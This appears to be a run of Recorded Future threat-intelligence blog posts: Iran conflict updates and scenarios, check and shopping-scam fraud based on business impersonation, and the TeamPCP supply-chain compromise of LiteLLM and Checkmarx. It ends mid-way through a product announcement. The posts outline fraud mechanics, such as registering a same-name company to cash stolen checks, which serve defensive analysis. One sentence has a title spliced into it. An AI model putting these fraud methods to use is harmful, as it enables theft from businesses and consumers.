This report is updated as the situation evolves across the geopolitical, cyber, and influence operations dimensions of this conflict. It will be of greatest interest to organizations in the US, Israel, and Gulf states concerned about targeting by Iranian state-sponsored or state-aligned threat actors, as well as those with exposure to energy markets, maritime shipping, and critical infrastructure potentially impacted by regional escalation.

The Latest Updates

Geopolitical Landscape

• Strait of Hormuz declared open; blockade status remains ambiguous. Iran and the US both announced on April 18 that the Strait of Hormuz is open to commercial shipping, following a Lebanon ceasefire agreement. Iran stated ships must take a "coordinated route" running close to its coastline, suggesting it retains some administrative role in transit. President Trump separately confirmed the US blockade of Iranian port traffic remains in place, leaving the practical enforcement picture unclear. Insikt Group assesses that while the announcement represents a meaningful de-escalation signal, the divergence between Iranian route requirements and the US blockade's continued status means the Strait's governance remains contested — and the risk of renewed disruption remains elevated until the terms are codified.
• Pakistan facilitating second round of US-Iran talks. A Pakistani delegation including Chief of Defense Forces Asim Munir met with Iran’s top negotiating officials in Tehran on April 16. Iran’s parliament has signaled a hard line: the ceasefire expiration must yield either international recognition of Iranian control over the Strait of Hormuz, or a return to war.
• Iraqi Shi‘a militias continue attacks despite ceasefire. Since the April 7 ceasefire, Iraqi Shi‘a militias - operating under the Islamic Resistance in Iraq (IRI) umbrella - have continued drone and missile strikes against GCC infrastructure in Bahrain, Kuwait, and Saudi Arabia, and targeted Iranian Kurdish dissident groups in Iraqi Kurdistan. Drone attacks at Baghdad International Airport on April 8 targeted a convoy carrying FBI personnel. Insikt Group assesses that Iran’s diminished command and control has afforded militias greater tactical autonomy, and that they do not perceive their operations as fully subject to the ceasefire. If the ceasefire collapses, militia activity will likely intensify significantly.
• Israel-Lebanon ceasefire announced; durability uncertain. President Trump announced a ten-day ceasefire between Israel and Lebanon beginning April 16. The first direct Israeli-Lebanese diplomatic talks since 1993 were held on April 14, facilitated by US Secretary of State Rubio. Hezbollah has denounced the talks; Lebanese President Aoun declined direct engagement with Israeli PM Netanyahu, citing the need for a ceasefire before direct negotiations. Insikt Group assesses this diplomatic engagement increases opportunities for de-escalation in Lebanon, but significant hurdles remain.

Cyber Threat Landscape

• GreenGolf (MuddyWater) conducting large-scale data exfiltration across the Middle East. Oasis Security reported on April 14 a multi-stage campaign attributed to infrastructure overlapping with GreenGolf, targeting more than 12,000 internet-exposed systems across aviation, energy, infrastructure, and government sectors across the Middle East. The campaign exploited five newly disclosed CVEs for initial reconnaissance, combined with credential harvesting via brute-force attacks against Outlook Web Access using the legitimate penetration testing tool Patator. Confirmed exfiltration included passport and visa records, payroll data, credit card information, and internal corporate documents from a compromised Egyptian aviation organization. C2 infrastructure used Python- and Go-based controllers communicating over TCP, UDP, and HTTP with AES encryption — consistent with the ArenaC2 framework pattern previously associated with GreenGolf activity.

Influence Operations

• Iran using state media to portray blockade as ineffective. Iranian state-affiliated outlets including Fars News and IRGC-affiliated Tasnim News are actively publicizing instances of sanctioned vessels transiting the Strait, framing the US blockade as a failure. Insikt Group assesses this reflects a coordinated information operation designed to reinforce domestic narratives of regime control over the strategic chokepoint and to limit public concern over the blockade’s anticipated economic impact.

If you’re a millennial or Gen Z-er, then you probably haven’t used a paper check in a while. According to the Federal Reserve Bank of Atlanta, just 1 out of 5 of your peers used a check in the last 30 days, versus 2 out of 5 Gen Xers and 3 out of 5 boomers. Yet despite year-on-year decreases in overall usage, Nasdaq Verafin saw check fraud instances rise another 11% in 2025.

Then again, if you are a millennial or Gen Z-er, you will have seen an advertisement for a cheap product on social media. For 40% of you, that has meant falling for an online shopping scam.

On the face of it, these look like two ends of the fraud spectrum:

• On the one hand, we have what feels like the past: paper check usage rates even among those aged 65+ fell from 13% of transactions in 2013 to 6% in 2025 (Federal Reserve Bank of Atlanta).
• On the other hand, we have the future: online shopping scams target a younger demographic through AI-enabled brand impersonation and sprawling social media ad ecosystems.

The payment instruments, demographics, and the teams working at financial institutions to address these problems differ. So what’s the thread linking them together? Business impersonation. It manifests itself differently across schemes, but for anti-fraud systems built to detect check washing and counterfeiting on the one hand, and unauthorized third-party card fraud on the other, business impersonation has emerged as the fraudster’s response to exploit both.

Commercial checks and copycat businesses across state lines

In the past, stolen checks were often whitewashed to change the recipient and amount, and then walked into banks for cashout. The Postal Inspection Service received over 299,000 mail theft complaints in a single 12-month period—a 161% increase from the prior year. Recorded Future’s Fraud Intelligence Team analyzed and mapped stolen checks to US geographies, illustrating hot spots of physical crime and observing that it remains a national issue that extends beyond heavily urbanized areas.

Mapping stolen checks by zip code; courtesy of Recorded Future

Yet even among declining consumer check usage rates, businesses’ use of commercial checks remains stubbornly high in the US: the Association for Financial Professionals (AFP) found that 91% of organizations are still using checks, and 63% experienced check fraud in 2024. When businesses send checks to suppliers, the amounts can rise quickly, leading fraudsters to expand beyond simple check-washing schemes.

In perhaps the most eye-catching example, fraudsters intercepted a commercial check destined for bubble-gum giant Bazooka in 2022. A $1.24 million check. Over the next two weeks, they transferred and withdrew over half a million dollars. How’d they do it? You can’t just wash out the payee name on a million-dollar check, replace it with John Smith, and expect it to clear after depositing it into a personal checking account.

Instead, the threat actors just created a fake Bazooka. The real Bazooka is registered in Delaware under the name “The Bazooka Companies, LLC”, so culprits registered a fictitious company in New York under the name “The Bazooka Companies 1 Inc”. They then used the official business license to open a corporate bank account for the new fictitious business. From there, they used cashier checks, withdrawals, and transfers to personal accounts to cash out the funds.

Fast forward to today, and the scheme is still happening. Recent research from Recorded Future Payment Fraud Intelligence (PFI) surveyed stolen checks for sale on Telegram in Q4 2025 and found over 30 checks with a business as the payee, along with suspicious new entities registered in other states a few days later. The total face value of the checks amounted to $2M.

As with most fraud, this scheme’s emergence is based on:

• Exploiting ecosystem gaps between disparate parties: Businesses can have the same name as another when registered in different states. Pair that with most states’ limited mandate to investigate business registrations, and we’re left with the first gap:

“As long as the basic filing requirements are met, the office[s] may have little or no authority to question or reject a document submitted for filing or to verify information included in the filing” (National Association of Secretaries of State, September 2025)

When a fraudster approaches a bank to open a business bank account, the bank conducts its own due diligence. But the focus here is on money laundering threats and the legitimacy of documents and applicants. If the fraudsters are using a clean identity — synthetic or otherwise — then the bank won’t have a clear reason to reject the application just because a business called John’s Toilet Supply, LLC exists in another state.

• Delivering a reactionary counterpunch to effective fraud processes: Think of this as the cat-and-mouse game. Fraud defenders figure out how to stop one scheme, forcing fraudsters to innovate. In this case, Positive Pay has proven remarkably effective at preventing check washing and counterfeit checks (when parties agree to use it). Payee Positive Pay, in particular, allows the payer to make sure that when their checks are deposited, the check number, date, payee name, and amount match their files. But what happens if everything is correct, but a copycat payee deposits the check? Cases like Bazooka.

80% discount on shoes? How can you say no?

If we detour into e-commerce, we see a very similar dynamic play out, but at a staggeringly larger scale. The premise is simple: use AI to launch a fake online shop impersonating company A, B, or C, buy ad space on social media to drive traffic, pocket the proceeds, and launder the funds while customers wait for goods that never arrive.

The scheme works because 53% of consumers, and 76% of Gen Zers, now begin shopping journeys on social media, according to Salesforce’s 2025 report. The problem is that the journey is littered with traps: in November 2025, leaked internal documents from Meta claimed the “company shows its platforms’ users an estimated 15 billion ‘higher risk’ scam advertisements — those that show clear signs of being fraudulent — every day”. Industry reporting paints the same picture, with the Better Business Bureau finding online shopping scams as the most reported scam type and social media advertisements as the most common originator.

The basics of the scheme are nothing new. Capture payment card data by creating a fake online store and advertise too-good-to-be discounts. What’s changed is that these are no longer just phishing websites. They’re functional online shops that process payments via merchant accounts. Behind each of these merchant accounts is a registered business.

This is creating problems throughout the ecosystem:

• Cardholders see websites that exactly mimic major (and increasingly niche) brands, letting discounts outweigh better judgment.
• Financial institutions face the challenge of balancing their duty of care to process customer transactions with the risks of fraud and money laundering. But in these cases, the traditional indicators of cyber-enabled fraud aren’t present. The cardholder is authorizing the transaction, and there’s nothing suspicious within the behavioral or device indicators of the 3D Secure authentication stream. (Because, again, it’s the cardholder doing the transacting under manipulation.)
• The fingers begin to point back at the acquirers and payment facilitators responsible for merchant onboarding, but, from their perspective, the entity holds a proper commercial license to engage in business issued by the local authorities. (Though, as a divergence from the check fraud scheme, the fraudsters in online shopping scams rarely impersonate a real big-name brand at the business creation and merchant onboarding stage. Instead, the fraudsters hide evidence of impersonation from the merchant onboarders and leave the impersonation for the ads and fake online shops visible to victims.)

But just like with the check fraud example, a big part of why online shopping scams have exploded — outside of generative AI making brand abuse content easier than ever to create at scale — is ecosystem gaps and fraudsters reacting to the defense:

• Exploiting ecosystem gaps between disparate parties: By the time a victim is making a purchase on an online shopping scam website, each entity along the way has looked to the one before and trusted that due diligence had been performed. The cardholder wants to trust that the social media platform screened out malicious advertisers; the card issuer wants to trust the cardholder vetted the merchant; the card network wants to trust the merchant onboarder verified the business; and the merchant onboarder wants to trust local authorities properly licensed the business. A big, long line of incentivized trust.
• Delivering a reactionary counterpunch to effective fraud processes: The industry has made huge strides in combating unauthorized, third-party card-not-present (CNP) fraud in the last decade. A major part of the success has been built on 3D Secure, introducing a layer of authentication on top of existing authorization controls. Online shopping scams completely sidestep the defensive layer by making the merchant the fraud surface and rendering cardholder authentication controls irrelevant.

Thinking towards the way out

On the check fraud side, the best solution may already be available, but, as with most solutions, it comes with trade-offs and adoption issues. The basic idea of Positive Pay and its derivative, Payee Positive Pay, is that a business informs its bank of the checks it is sending, and the bank only disburses funds if the check matches what the business provided. Positive Pay was designed to combat counterfeit and forged checks, and it does that very well.

Of course, in the Bazooka example of same-name business impersonation, this wouldn’t help. Nothing about the check was modified. So here, banks offer Reverse Positive Pay, which basically means the business personally signs off on each sent check. It can solve the problem but shifts more operational and investigatory expenses onto the business (which might explain why adoption rates are south of 20%, according to Datos Insights and Alkamai). In the end, though, it makes you wonder why not heed the advice and move to alternative electronic payment methods?

On the online shopping scam side, solutions are more complex and scattered across the ecosystem.

• At the top of the funnel, there’s rising pressure on online advertising platforms to do a better job at limiting the presence of fraudulent advertisements. Based on more leaked internal Meta documents, regulatory pressure may not be producing the desired outcome.
• At the merchant onboarding level, both the major card networks are forcing acquirers and payment facilitators to do more to defend the gates into payment processing, while also devoting more resources to identifying scam merchants that do make it in.

For card issuers on the frontline, it’s a more delicate dance. Card issuers aren’t on the hook for authorized card payments to fraudsters under the Fair Credit Billing Act (FCBA) or Electronic Funds Transfer Act (EFTA), but 67% of cardholders expect them to cover scam losses. Though when cards transacting on scam websites end up on the dark web for resale, and unauthorized charges start rolling in, it is the issuer’s problem.

The best solution aligns with the industry’s movement toward CTI-fusion models to address the cyber component of cyber-enabled fraud. The convergence of online shopping and purchase scams is precisely the type of problem the new organizational model was meant to combat.

In applying the CTI-fraud fusion model to purchase scams, traditional fraud assets start at the end of the fraud attack chain to correlate reported cardholder manipulation and non-delivery alerts against merchant account patterns. The CTI assets start at the beginning, sourcing online shopping scams at runtime and attributing the abused merchant accounts. The two teams then meet in the middle, using modeled transaction patterns and threat-hunted active scam websites, ultimately leading to the deployment of merchant-based fraud risk rules.

So, in the meantime, where does all this leave us? The same thing you’ve heard plenty of times: stop using checks if you can and don’t trust too-good-to-be-true offers from online ads.

How Recorded Future Helps

The research in this blog came directly from Recorded Future's Fraud Intelligence teams. Two capabilities speak to the threats described.

• Payment Fraud Intelligence — tracks the complete fraud lifecycle: for check fraud, it uses OCR to extract payee, amount, and date from compromised checks being sold in forums, enabling deposit screening against known stolen checks; for card fraud, it monitors compromised merchants, stolen cards on criminal marketplaces, and the tester merchants fraudsters use to validate cards before striking.
• Digital Risk Protection — provides continuous monitoring across millions of sources for malicious sites, brand and executive impersonation, data leakage, and dark web mentions — with risk-based alerting that surfaces only actionable threats and takedown workflows built directly into the Platform.

In March 2026, a group calling itself TeamPCP compromised LiteLLM (a Python package with roughly 97 million monthly downloads used by thousands of organizations to connect to AI services) and Checkmarx (one of the most widely used application security testing platforms on the planet). How they got in isn’t publicly confirmed. But the result was write access to a trusted software repository.

From there, they injected a credential-harvesting payload into the software and poisoned two Checkmarx GitHub Actions workflows. The malware ran silently on installation, vacuuming up access keys, cloud credentials, secrets, and (the cruelest irony) every AI API key that LiteLLM was specifically designed to manage. The stolen data was encrypted, then pushed to a lookalike domain.

And here is the part that should keep you up at night: this was one campaign, by one group, in one week. The downstream consequences are still unfolding.

Identity Is the Perimeter (and the Attack Surface)

The throughline in the TeamPCP campaign is identity. Start to finish.

TeamPCP intelligence summary courtesy of Recorded Future.

No one has publicly confirmed exactly how TeamPCP gained access to the LiteLLM maintainer’s repository, but the most likely vector is stolen credentials. Recorded Future’s identity intelligence contains almost 1 million compromised GitHub developer credentials harvested by infostealers and sold across dark web marketplaces. A single publishing token or access key, lifted from a prior infection and left unrotated, would have been sufficient. TeamPCPs’ earlier compromise of Aqua Security’s Trivy infrastructure in late February (where incomplete credential rotation left residual access open for weeks) demonstrates exactly this pattern: one stolen token, one missed rotation, and the door stays open.

Whatever the precise mechanism, TeamPCP used valid credentials to push malicious code into trusted repositories. No firewall to bypass. No endpoint to exploit. Just a valid login and the implicit trust that comes with it.

Then the payload itself was designed to steal more identities. Each compromised environment yielded credentials that unlocked the next target. Trivy led to GitHub Actions. GitHub Actions led to four additional software distribution ecosystems. One incomplete incident response created a cascading chain of supply chain compromises across five ecosystems in five days.

This is the identity and access management problem stated as plainly as possible: if the perimeter is identity, then every stolen credential is a breach in the wall. And unlike a firewall rule, a stolen credential doesn’t trigger an alert. It just works.

We previously wrote about how deserialization vulnerabilities have plagued enterprise software for over a decade. The pattern is always the same: trusting input that should not be trusted. Supply chain attacks are the organizational equivalent. We trust the packages we install. We trust the pipelines we build. We trust the security tools we deploy. TeamPCP exploited every layer of that trust, starting with a single compromised identity.

The Impact Is Not Just Ransomware

TeamPCPs’ Telegram channel references a ransomware victim’s site. The group appears to operate as a ransomware affiliate and has publicly discussed extorting companies by threatening to release over 300 GB of stolen data. Reports indicate a possible collaboration with the Lapsus$ extortion group. Ransomware is the obvious play.

CipherForce intelligence summary courtesy of Recorded Future.

But ransomware is only the most visible impact. The more dangerous question is: what else can you do with over a million stolen cloud credentials, API keys, and service account tokens?

The answer, based on what Insikt Group is tracking across multiple unrelated campaigns, is far broader than encryption and extortion.

Redirect payroll. Late last year (2025) Insikt Group was monitoring activity around a campaign called “Swiper,” run by likely Russian-speaking actors who set up phishing infrastructure impersonating major financial institutions and payroll service providers. Stolen credentials were transmitted in real time, enabling the actors to alter direct deposit accounts and redirect payments before anyone noticed. The responsible actor was identified through a dispute on a criminal forum, and their cryptocurrency wallet has processed over 7,000 transactions. This was a credential theft operation that converted identity compromise directly into financial theft. Now imagine that same playbook amplified by a supply chain attack that harvests payroll platform credentials at scale.

Reroute shipments. Separately, Insikt Group has identified TAG-160, a threat group targeting the US logistics and transportation sector. TAG-160 impersonates logistics companies, sends fraudulent rate confirmations via phishing emails, and delivers remote access malware. But TAG-160 has also been caught running “double brokering scams,” where they pose as a legitimate carrier, obtain valid load details from a real broker, then re-advertise the load under the broker’s name to contract a different carrier. The legitimate carrier moves the freight. The threat actor collects the payment. The real carrier never gets paid. A second, unrelated threat cluster targets German logistics companies with a similar playbook.

These are not theoretical scenarios. They are active campaigns running in parallel with the TeamPCP supply chain compromises. And the common denominator across all of them is credential theft and identity abuse.

In the five risk impact categories we use as a framework for translating cyber threats into business risk, the TeamPCP compromise touches every single one: operational disruption (ransomware, system lockout), financial fraud (payroll redirection, double brokering fraud, extortion payments), competitive disadvantage (credentials, trade secrets, PII), brand impairment (customers learning their security tooling was the vector), and legal and compliance consequences (breach notification obligations, potential liability for downstream impacts).

The tendency is to categorize supply chain attacks as a “security tool problem” or a “developer problem.” It is neither. It is a business risk problem whose blast radius extends from IT operations to payroll to logistics to the boardroom.

Organizations should ask how they can use AI-driven analysis to continuously verify the integrity of every package and build artifact entering their production systems. This means comparing distributed packages against their source repositories to detect injected code. It means analyzing updates to flag anomalous changes in behavior. It means automated provenance verification that traces software from source to distribution, flagging breaks in the chain.

But the TeamPCP campaign exposed a truth the industry has been slow to internalize: the security tools themselves are targets. TeamPCP specifically chose a vulnerability scanner and an application security platform because those tools have the broadest access to credentials and infrastructure. Compromising the tool that checks your code is the ultimate fox-in-the-henhouse scenario.

The organizations that weather this era of supply chain risk will be those that treat code integrity verification as a continuous, automated, AI-augmented process rather than a periodic audit.

So What. Now What.

TeamPCP is not done. Their Telegram channel explicitly states the operation is still unfolding, and they claim to be working with new partners to monetize stolen data at scale.

For security leaders, the immediate actions are straightforward: if your organization uses LiteLLM, Trivy, or Checkmarx GitHub Actions, assume compromise and rotate every credential on affected systems. Audit your software pipelines for unauthorized changes. Pin software dependencies to verified, immutable versions.

But the longer-term lesson is more fundamental. Supply chain attacks convert the trust model of modern software development into an attack surface. The packages you install, the tools you run, the pipelines you build: these are not neutral infrastructure. They are vectors. And the credential stolen today from a compromised software package could show up tomorrow as a payroll redirect, a rerouted shipment, or a ransomware demand.

The keys to your kingdom are scattered across every package manager, every automation token, and every service account in your environment. Someone is collecting them. And your supply chain breach is already someone else’s payday.

How Recorded Future Helps

The TeamPCP campaign left signals at every stage. Three Recorded Future capabilities speak directly to this threat:

• Identity Intelligence — monitors infostealer logs, dark web markets, and credential dumps in real time, automatically detecting compromised employee credentials and triggering immediate response — including the nearly one million compromised GitHub developer credentials already in Recorded Future's dataset.
• Insikt Group — elite analysts with deep government, law enforcement, and intelligence agency experience who produced the TeamPCP, Swiper, TAG-160, and CipherForce research in this blog. Customers see threats as they develop, not after they've made headlines.
• Third-Party Risk — continuously monitors vendors for ransomware extortion activity, breach indicators, and credential leaks, replacing point-in-time questionnaires with real-time visibility across your supply chain.

Leaders should plan for multiple future scenarios, prioritizing resilience and effective decision-making

Current State (April 10)

• Severe tensions persist despite a two-week ceasefire:
  The agreement remains fragile and conditional on reopening the Strait of Hormuz; each side has already accused Iran War: Future Scenarios and Business Implications the other of violations.
• Maritime flows partially resume but remain uncertain:
  Disruptions and elevated security risks persist. President Trump has signaled readiness to resume strikes on Iranian infrastructure if ceasefire conditions are not met.
• Economic conditions remain unstable:
  Energy markets remain volatile, with continued pressure on supply chains. Shipping, insurance, and aviation activity are only partially restored. Inside Iran, infrastructure damage is driving power shortages and industrial disruption.
• Cyber activity has intensified:
  Operations targeting energy and critical infrastructure are increasing, reinforcing systemic risk across key sectors.

Figure 1: An explosion in Tehran, February 28, 2026 (Source: PBS)

Figure 2: Cone of Plausibility Overview: Iran Conflict (Source: Recorded Future)

Framework Overview

To assess how the Iran conflict could evolve over the next 6–12 months, Insikt Group analyzed regional and global dynamics using the PESTLE-M framework, covering Political, Economic, Social, Technological, Legal, Environmental, and Military domains, with a focus on Iran, the United States, Israel, and Gulf States.

Figure 3: PESTLE-M Framework (Source: Recorded Future)

This analysis informed a scenario generation exercise using a Cone of Plausibility (CoP) method. The objective was not to predict a single outcome, but to explore a range of alternative futures based on observed signals and emerging trends.

Methodology

For each PESTLE-M category, we identified key drivers that could increase or decrease the likelihood of escalation, de-escalation, or sustained instability, and assessed how these dynamics may evolve under different assumptions. These were combined to develop six scenarios: one baseline, two plausible (best and worst case), and three wildcard scenarios, enabling organizations to evaluate how the conflict may unfold and the potential impacts on their operating environment.

Within the CoP framework:

• Drivers are signals and trends that could shape future developments
• Assumptions reflect how those drivers may evolve over time
• Scenarios describe how these dynamics could combine to produce distinct future states

We define scenarios as follows:

• Baseline: A forward projection of current trends and conditions
• Plausible: A realistic alternative outcome based on evolving drivers and assumptions
• Wildcard: A low-probability, high-impact scenario that challenges existing assumptions

Baseline Scenario: Fragile Ceasefire with Sustained Economic Disruption

Key Drivers and Assumptions

• Conditional ceasefire -> Underlying conflict causes unaddressed
• Maritime coercion -> Economic warfare persists
• Infrastructure targeting -> Energy disruption continues

Figure 5: Brent oil prices and projections (Source: Oxford Economics)

Figure 6: Iran is also threatening maritime traffic through the Bab al-Mandab, another key route (Source: Times of India)

Baseline: A forward projection of current trends and conditions

Ceasefire holds, but conflict shifts into sustained economic warfare.

A fragile ceasefire reduces the pace of direct military exchanges strikes, but the drivers of conflict remain unresolved. Iran lacks the capacity for decisive escalation but retains asymmetric leverage, while the US prioritizes energy market stability and conflict containment. The Strait of Hormuz reopens only intermittently, with recurring disruptions, inspections, and security incidents, keeping shipping, insurance, and energy markets under sustained pressure. Gulf financial, logistics, and technology sectors operate intermittently, airlines maintain some route suspensions, and cyber activity remains elevated against regional infrastructure and Western-linked organizations. The conflict evolves into economic coercion as a primary tool, driving elevated oil and gas prices, persistent market volatility, and tighter financing conditions. Supply chains gradually reconfigure away from high-risk routes, increasing costs and reducing efficiency. Russia benefits from sustained high energy prices and reduced Western focus, strengthening its position in Ukraine. China capitalizes on fragmentation by expanding alternative trade and financial networks, reinforcing a more bifurcated global system.

Likelihood

Most likely if ceasefire holds without resolution: Conflict remains below full-scale war, but economic disruption persists as the dominant mode of competition.

Plausible Scenario (Best Case): Managed Stalemate

Key Drivers and Assumptions

• US threats and military strikes fail to coerce Iran into concession -> Limited appetite for sustained conflict
• Significant economic disruption -> Economic costs drive political decisions
• US military footprint in region -> Potential for re-escalation

Figure 7: US President Trump delivers a warning to Iran at a White House Easter event (Source: PBS News)

Figure 8: Iran has used maritime traffic through the Strait of Hormuz as leverage in the conflict (Source: CNBC)

Plausible: A realistic alternative outcome based on evolving drivers and assumptions

The US portrays its leadership decapitation campaign as successfully facilitating “regime change,” creating space for diplomatic engagement with “new” leadership. Iran maintains increased level of oversight over the Strait of Hormuz, while internally the IRGC plays a greater role in strategic decision-making.

Domestic economic and political pressure leads to the US to scale back military operations without clear resolution of key regional security issues, including Iran’s right to nuclear enrichment, ballistic missile program, and support to regional proxies. Maritime traffic slowly returns to pre-war levels, with a new protocol for vessel traffic under an internationally accepted mandate. Iran retains an increased level of oversight over the Strait of Hormuz passages and profits from the traffic. This relieves some economic strain, though lingering supply chain effects remain. Cyber attacks persist as a means of asymmetric coercion. The US lifts some sanctions against the “new” regime, but other sanctions remain in place, complicating the regulatory environment. Interest in renewable energy increases as companies seek to mitigate against future disruption, though oil demand returns to pre-conflict norms. Israel continues limited, highly targeted strikes, while the US retains its military presence in the region, keeping the possibility for re-escalation open.

Likelihood

Less likely as conflict continues: This scenario assumes the US’s limited appetite for full-scale war, but the opportunities for de-escalation diminish as the conflict persists.

Plausible Scenario (Worst Case): Regional Conflict with Gulf Involvement

Key Drivers and Assumptions

• Conditional ceasefire -> Continuing provocation re-escalates conflict
• Strait of Hormuz chokehold effective -> Asymmetric advantage to disruption
• Gulf infrastructure targeted -> Multi-state escalation

Figure 9: The Saudi crown prince reportedly urged President Trump to continue war (Source: NYT)

Figure 10: The UAE has been proactive in the conflict, taking nonmilitary measures against Iran (Source: South China Post)

Plausible: A realistic alternative outcome based on evolving drivers and assumptions

Ceasefire collapses, triggering multi-state regional war.

A temporary ceasefire breaks down following renewed strikes and failure to secure maritime access. Iran escalates missile and proxy attacks, including targeting Gulf energy infrastructure. With critical thresholds crossed, Saudi Arabia, the UAE, and Bahrain enter the conflict directly to protect economic and political stability. The Strait of Hormuz and Bab al-Mandab become sustained conflict zones, with repeated attacks, mining, and vessel seizures. Shipping and insurance markets withdraw at scale, severely constraining global energy flows. Energy prices surge, driving inflation and recession risk globally. Fuel shortages emerge in import-dependent economies, triggering industrial slowdowns, reduced mobility, and rolling outages. Cyber operations escalate into coordinated campaigns targeting energy, logistics, and financial systems. Legal fragmentation accelerates, with overlapping sanctions regimes, asset controls, and enforcement actions constraining cross-border operations. Russia exploits elevated energy revenues and reduced Western focus to press its advantage in Ukraine. China remains indirect but leverages Western overstretch to increase pressure on Taiwan.

Likelihood

More likely if ceasefire collapses and Gulf assets are targeted: Escalation becomes self-reinforcing once regional actors are drawn into direct conflict.

Wildcard Scenario 1: Lasting Peace Agreement

Key Drivers and Assumptions

• Severe degradation of Iranian infrastructure -> Iran compelled to concede
• Global economic disruption → International support for peace process
• Sustained disruption to Hormuz and energy markets → Mutual incentive to stabilize

Figure 11: Pakistan has offered to host talks to broker peace between US, Iran (Source: Time)

Figure 12: Traffic through the Strait of Hormuz dropped significantly since conflict began (Source: Lloyd's List)

Wildcard: A low-probability, high-impact scenario that challenges existing assumptions

Negotiated settlement reached between the US and Iran, allowing for longterm drawdown of conflict.
Significant degradation of Iran’s energy, military, and industrial infrastructure, combined with mounting economic strain, power shortages, and reduced capacity to sustain conflict, compels Tehran to reassess its position and signal willingness to accept concessions. In parallel, the United States faces rising economic costs from prolonged energy disruption, inflation, and market instability, increasing pressure to stabilize conditions. A negotiated settlement emerges through indirect talks, mediated by Oman, with Iran accepting concessions on maritime security and nuclear constraints in exchange for phased sanctions relief and assurances against further strikes. Iran seeks a revised Strait of Hormuz security framework and limited economic concessions, though broader demands such as reparations are only partially addressed. The Strait of Hormuz fully reopens under agreed security mechanisms, restoring stable shipping and energy flows. Sanctions ease gradually, enabling reintegration of Iranian energy exports and limited foreign investment. Military activity declines sharply, cyber operations reduce, and global energy markets stabilise, easing inflationary pressures and improving financial conditions.

Likelihood

Low probability: Requires significant concessions from one side under sustained pressure.

Wildcard Scenario 2: Iranian Regime Collapses

Key Drivers and Assumptions

• Decades of political repression -> No viable alternative to Iranian regime
• Sectarian and political unrest -> Protracted internal conflict
• Targeting of leadership -> Regime instability and eventual collapse

Figure 13: Mass protests against the regime in December 2025 were brutally repressed (Source: Le Monde)

Figure 14: Displaced Syrians have lived in refugee camps for ten years, demonstrating the long-term impacts of internal conflict (Source: UNHCR)

Wildcard: A low-probability, high-impact scenario that challenges existing assumptions

The Islamic Republic collapses, plunging the country into a civil war and complex humanitarian crisis.

The US and Israel’s persistent “decapitation strategy” weakens the regime to the point where it is no longer able to assert internal control. With no viable alternative, the country falls into a multiparty civil war made up of pro-regime, pro-democracy, and assorted regional and ideological militias. Food and fuel shortages are severe in certain regions. Refugee camps are built in Iraq while Europe’s asylum system faces overwhelming demands. The US claims Kharg Island in the chaos and asserts control over the Strait of Hormuz, mitigating international economic damage. However, the political instability gives pro-regime and other ideological groups a base for asymmetric operations, leading to persistent regional disruption. Cyber capabilities degrade amid internal fighting, though some hacktivist operations persist against a wider variety of ideological enemies. Damage to water and energy facilities sustained during the conflict exacerbates humanitarian crisis and slows recovery. Russia supplies military support to pro-regime factions, but not enough to significantly tilt the balance of power.

Likelihood

Long-term resilience of regime and viability of alternatives is unknown, making it difficult to assess likelihood with confidence.

Wildcard Scenario 3: Nuclear Crisis

Key Drivers and Assumptions

• Protracted high-intensity conflict -> Increased likelihood of miscalculation
• Location of facility -> Risks of radiological contamination spread by air and water
• Diplomatic failures -> Inability to coordinate on response

Figure 15: Bushehr has not yet been a direct target, though missiles have landed near it (Source: Development Aid)

Figure 16: Weather patterns following the Chernobyl nuclear disaster spread radiological material affecting up to 6 million people (Source: UNSCEAR)

Wildcard: A low-probability, high-impact scenario that challenges existing assumptions

Missile strikes hitting a nuclear facility lead to a radiological incident, causing immediate global shock and rapid escalation.

A missile strike causes extensive damage to Iran’s Bushehr civilian nuclear power facility, causing radiological release with cross-border contamination. This occurs due to escalation, miscalculation, or degraded command and control. Immediate impacts include evacuation zones and disruption to regional energy supply. Emergency response efforts are delayed by ongoing conflict, limiting containment and extending environmental and economic damage. As a result, southern Iran and Gulf States experience long-term harm to drinking water supply and maritime food sources. The conflict also prevents long-term monitoring in Iran, which extends the long-term health and environmental damage from inadvertent exposure. Contamination further restricts maritime trade routes in the Gulf, while energy markets react sharply to both supply disruption and elevated systemic risk. Cyber and information operations amplify panic and misinformation.

Likelihood

Low probability, high impact: Risk of intentional or unintended strike increases under sustained conflict.

The global threat landscape didn't simplify in 2025. It shattered. Recorded Future's Insikt Group® 2026 State of Security documented how geopolitical fragmentation, state-sponsored operations, and criminal ecosystem adaptation reshaped global risk. Threats that once stayed in distinct lanes converged, and they converged fast.

Consider what Insikt Group® tracked last year:

• State-sponsored cyber actors shifted from intelligence collection to persistent access, pre-positioning inside target infrastructure so they can disrupt operations the moment geopolitical tensions escalate.
• Weak governance and systemic corruption fueled industrialized cybercrime, enabling payment fraud and criminal operations to scale like legitimate businesses.
• Influence operators and hacktivist groups multiplied alongside rising interstate conflict, amplifying fear, uncertainty, and doubt through exaggerated exploit claims.
• Loosely organized criminal collectives used social engineering to compromise third-party SaaS platforms, rapidly adapting to law enforcement action and traditional defenses alike.

The risk surface has expanded well beyond networks and endpoints. Your brand, your third-party vendors, your payment networks: each has its own threat actors, its own attack methods, and its own intelligence requirements. Yet most intelligence programs only cover one of these domains. Or they monitor them in silos, with no shared context.

The right intelligence, from the right sources, at the right time, is a critical competitive advantage. But intelligence only matters if you can act on it across every critical risk domain before attackers reach their objective.

Re-Imagining How Intelligence Is Delivered And Operationalized

Historically, Recorded Future has been sold on a per-user and per-capability basis - a model that worked well in a simpler world where security teams were focused on solving the most urgent problem in front of them.

Today’s threat landscape is fast, more complex, and deeply interconnected. Customers are no longer looking for point solutions, they’re asking for a fundamentally different way to consume and operationalize intelligence.

Customers are asking us to provide:

• Complete capabilities to support use cases aligned with core risk domains.
• Democratized access to intelligence across teams, workflows and systems.
• A simplified and predictable way to purchase for ease of budgeting and adoption.

In response, we’ve re-imagined Recorded Future is delivered:

“Four Solutions. Three Packages. One Intelligence Foundation.”

A unified approach designed to scale with your organization, accelerate time to value, and embed intelligence into every decision that matters.

Four Solutions for Four Critical Risk Domains

Your threats span your infrastructure, your brand, your vendors, and your payment networks. Your intelligence should too. We’ve re-organized our platform into four purpose-built solutions tied to distinct domains of enterprise risk.

Cyber Operations gives your security team the intelligence, workflows, and autonomous actions to detect, investigate, and respond to threats targeting your infrastructure. Alert triage, real-world vulnerability prioritization, malware analysis, proactive hunting: this is where reactive firefighting becomes predictive, intelligence-led defense.

